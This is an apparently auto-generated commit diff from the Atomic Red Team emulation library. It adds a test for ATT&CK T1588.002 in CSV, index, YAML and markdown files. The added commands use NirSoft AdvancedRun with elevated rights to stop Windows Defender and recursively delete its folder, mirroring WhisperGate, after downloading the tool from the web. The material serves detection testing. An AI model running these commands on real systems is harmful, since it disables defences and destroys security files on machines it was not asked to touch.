Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

This commit is contained in:
CircleCI Atomic Red Team doc generator
2022-01-21 18:33:41 +00:00
parent 5d37919c53
commit 87dcee4a1c
6 changed files with 112 additions and 4 deletions
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
+1
View File
@@ -867,6 +867,7 @@ discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
resource-development,T1588.002,Tool,1,Run NirSoft AdvancedRun,f7d43d35-d628-4582-bb03-01b1c5e10d11,powershell
execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
867 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
868 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
869 discovery T1124 System Time Discovery 3 System Time Discovery in macOS f449c933-0891-407f-821e-7916a21a1a6f sh
870 resource-development T1588.002 Tool 1 Run NirSoft AdvancedRun f7d43d35-d628-4582-bb03-01b1c5e10d11 powershell
871 execution T1059.002 AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
872 execution T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
873 execution T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
+2 -1
View File
@@ -1429,7 +1429,8 @@
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1588.002 Tool](../../T1588.002/T1588.002.md)
- Atomic Test #1: Run NirSoft AdvancedRun [windows]
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+42 -1
View File
@@ -59176,7 +59176,48 @@ resource-development:
x_mitre_detection: Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on post-compromise phases of the adversary lifecycle.
atomic_tests: []
identifier: T1588.002
atomic_tests:
- name: Run NirSoft AdvancedRun
auto_generated_guid: f7d43d35-d628-4582-bb03-01b1c5e10d11
description: "Information on NirSoft AdvancedRun and it's creators found here:
http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe
with similar behavior identified during the WhisperGate campaign.\nUpon successful
execution, AdvancedRun.exe will run and stop Defender and attempt to delete
the Defender folder on disk. \n"
supported_platforms:
- windows
input_arguments:
local_folder:
description: Local path of AdvancedRun executable
type: Path
default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun
local_executable:
description: name of the advancedrun executable
type: String
default: advancedrun.exe
dependency_executor_name: powershell
dependencies:
- description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable}
'
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
'
get_prereq_command: |
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
executor:
command: |
#{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
#{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction
Ignore
'
name: powershell
elevation_required: true
T1608.001:
technique:
external_references:
+65
View File
@@ -0,0 +1,65 @@
# T1588.002 - Tool
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1588/002)
<blockquote>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</blockquote>
## Atomic Tests
- [Atomic Test #1 - Run NirSoft AdvancedRun](#atomic-test-1---run-nirsoft-advancedrun)
<br/>
## Atomic Test #1 - Run NirSoft AdvancedRun
Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk.
**Supported Platforms:** Windows
**auto_generated_guid:** f7d43d35-d628-4582-bb03-01b1c5e10d11
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_folder | Local path of AdvancedRun executable | Path | PathToAtomicsFolder&#92;T1588.002&#92;bin&#92;AdvancedRun|
| local_executable | name of the advancedrun executable | String | advancedrun.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
#{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
```
#### Cleanup Commands:
```powershell
Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Advancedrun.exe must be located at #{local_folder}\#{local_executable}
##### Check Prereq Commands:
```powershell
if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
```
<br/>